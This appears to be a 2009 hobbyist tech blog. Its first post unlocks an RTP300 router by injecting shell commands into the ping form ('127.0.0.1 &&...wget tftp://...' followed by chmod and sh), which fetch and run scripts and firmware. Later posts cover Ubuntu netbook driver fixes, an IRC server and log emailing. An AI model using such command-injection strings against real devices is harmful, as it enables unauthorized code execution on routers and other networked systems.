Hello Guys Here’s how to hack your Jailed RTP300

Step 1. Files you will need
  1. tFTP -> http://tftpd32.jounin.net/download/Tftpd32-3.35-setup.exe
  2. The Zip -> Hack RTP300.zip
  3. Firefox -> www.mozilla.com/en-US/firefox/ With -> https://addons.mozilla.org/en-US/firefox/addon/60
  4. A beer

Keep this page aways up so you have something to look at case you forget something

Step 2: Configure TFTP32

  1. Run TFTP32. Click settings, and then setup the base directory. Use the directory you installed the program (ex. C:\Program Files\TFTP32) and make sure the extracted files from the ZIP are in this directory. Change security to none, and set the timeout and max retransmit to 10 and then hit OK.

Step 3: Unlock the Console using Ping Hack

  1. Make sure you have downloaded everything from step 1 and ensure the getready file from the ZIP is in the TFTP32 folder. Now disconnect from the internet and connect directly to the RTP300 making sure the device is also not connected to the internet (ie. pull the Ethernet cord out of the WAN port). Also make sure to disable any Anti-Virus and firewall programs that may be running.
  2. Use a paperclip and hard reset the RTP300 (hold reset for 10-15 seconds). Go to »192.168.15.1 with the username/pass of admin/admin. Once the router restarts go to Administration >> Ping. Also make sure TFTP32 is running.
  3. On the Ping popup, right click >> Web Developer >> Forms >> Remove Maximum Lengths.

Enter the following and click Ping.

  1. 127.0.0.1 &&cd /var/tmp &&wget tftp://192.168.15.100/getready

Right Click >> Web Developer >> Forms >> Remove Maximum Lengths. Enter the following and click Ping.

  1. 127.0.0.1 &&cd /var/tmp &&chmod 755 getready

Right Click >> Web Developer >> Forms >> Remove Maximum Lengths. Enter the following and click Ping.

  1. 127.0.0.1 &&sh /var/tmp/getready

After a few seconds you should see some information in the output box. Scroll down to the last line and look for CONSOLE_STATE unlocked. If you see this you are good to go. Now Restart the RTP300

Step 5. The Hack

  1. Log back into the router and go to Administration >> Ping. Also make sure TFTP32 is running.
  2. On the Ping popup, right click >> Web Developer >> Forms >> Remove Maximum Lengths.

Enter the following and click Ping.

  1. 127.0.0.1 &&cd /var/tmp &&wget tftp://192.168.15.100/install

Right Click >> Web Developer >> Forms >> Remove Maximum Lengths. Enter the following and click Ping.

  1. 127.0.0.1 &&cd /var/tmp &&chmod 755 install

Right Click >> Web Developer >> Forms >> Remove Maximum Lengths. Enter the following and click Ping.

  1. 127.0.0.1 &&sh /var/tmp/install

You should now see a file transfer in progress under TFTP32. After the firmware has been transferred the power light on the RTP300 will start to blink if everything is successful. DO NOT INTERRUPT THIS PROCESS. IT MAY TAKE UP TO 2-4 MINUTES TO COMPLETE. WAIT FOR THE POWER LIGHT TO RETURN SOLID AND FOR AN ETHERNET LINK TO BE ESTABLISHED.

Boom Son you got non vonage RTP300!!!

Ubuntu on Acer Aspire one AOD250 KAV60

I have Read a lot of people on the Ubuntu Fourms having issues with Acer AOD250 with Wifi, Webcam, and Sound. Lets get down to it…

****Note: Start with a Fresh Install if you can. If not this may or may not work due to other software/drivers installed. Also I used Ubuntu 9.10, on Acer Aspire One 250 Model: KAV60 1.13.

Wifi Fix I fixed the wifi issue by using the proprietary STA Driver After install I went into

System > Administration > Hardware Drivers

Removed B43 and Installed STA Driver Then Rebooted

Yay it works!

Webcam For this I just installed “luvcview”

sudo apt-get install luvcview

To test it I used “cheese”

Applications > Sound & video > Cheese Photo Booth

It does take 15 sec to start the video.

Yay! we got webcam!!

Sound

Download Alsa Driver and install it I used the following commands

wget ftp://ftp.alsa-project.org/pub/driver/alsa-driver-1.0.20.tar.bz2
tar xjvf alsa-driver-1.0.20.tar.bz2
cd alsa-driver-1.0.20
sudo apt-get install build-essential module-assistant
./configure –with-cards=all
make
Install it
sudo make install

Reboot
Yay we got our mic

New IRC Server in UK & TTK New…

Posted on : 20-12-2009 | By : admin | In : Network, Server, TechToKnow

We got a new server “Lithium” witch is in the UK this will provide UK people a faster connections. Take a look at the speed update.

User 1 UK:   User to RedFire(US): 270 ms, User to Lithium UK: 32 ms.

User 2 UK:   User to RedFire(US): 589 ms, User to Lithium UK: 106 ms.

Now if you add Lithium to Hub its +89.1 ms.

This is a big update for TechToKnow, and to keep you connected to the fastest IRC Server you will be tested before you connect each server will ping you for the fastest server and load you to it. So You will know your chatters will always have the fastest server and if the ping fails we will load a default one.

Also like to take a Look at your ping to it? take a Look at the Servers page of TechToKnow IRC we added it so you can look at your ping, Its not Open for Public use yet but will be up ASAP.

Have Fun and happy chatting!

Router, Antivirus, and Firewall Log Emailing

Posted on : 18-12-2009 | By : rcp | In : Uncategorized

I have all my Logs from my Firewall, antivirus and router logs sent to me every day.

For this I used

NETGEAR WGR614v8(Comcast gave me).

Avast(I use the free it work nice).

hMailServer(Very cool Mail Server for windows)

For the Server I’m using IP: 192.168.1.100 and port(s), 25, 110, and 143. Now Install hMail Server on a windows Computer after installing it,

Log into the admin panel

  1. Domains
  2. Click “Add”
  3. Domain: homenetwork.local
  4. Click “Save”
  5. Under Domains “homenetwork.local” click “Accounts”
  6. Click “Add”
  7. Address: network
  8. Password: thepassword
  9. Maximum size (MB): 25 (That will do for now)
  10. Click “Save”
  11. Your set just Config your Email client to this server

Now Install Avast on Computers

Then after its done installing…

Restart -> Right click the blue “a-ball” in the bottom right corner of the screen, then left click “Program Settings..” -> STMP.

Then we just add our new Mail Server’s info.

  1. Server address: 192.168.1.100
  2. Port: 25
  3. From address: PC-NAMEHERE-advast@homenetwork.local
  4. SMTP server requires authentication: Cheak Box
  5. User name: network@homenetwork.local
  6. Password: thepassword
  7. Click ok

Right click the blue “a-ball” in the bottom right corner of the screen, then left click “Program Settings..” -> Alerts.

  1. Click “Add” then SMTP
  2. Net alert address:  network@homenetwork.local
  3. Click ok
  4. Then Click “Test all”

There you have emails when your computer get’s a Vrius.

Now in my Router I set it up to send the router logs aswell

  1. http://192.168.1.1/ (This is the ip of the netgear I have)
  2. Login -> admin -> Password
  3. Then when logged in go to -> Email
  4. Click “Turn E-mail Notification On”
  5. Your Outgoing Mail Server: 192.168.1.100
  6. Send To This E-mail Address: network@homenetwork.local
  7. Click “My Mail Server requires authentication”
  8. User Name: network@homenetwork.local
  9. Password: thepassword
  10. Click “Apply”

Now you have your router sending you emails when issues comes up.

Now I have also set this up on my SonicWall TZ 180 But cause most of you don’t have $400+ for a SonicWall I don’t think your going to need to know how to set that up.

The Firewall Emails:

12/18/2009 01:55:30.433 - 	Gateway Anti-Virus Alert: OnlineGames.ZWG (Trojan) blocked - 	76.208.39.148, 57135, WAN - 	192.168.168.65, 52568, LAN -
12/18/2009 00:32:17.216 - 	Possible port scan detected - 	70.42.186.83, 443, WAN - 	192.168.1.3, 64929, WAN - 	TCP scanned port list, 64913, 64919, 64923, 64925, 64927

and I have not had a virus so, the only email I got was the test email
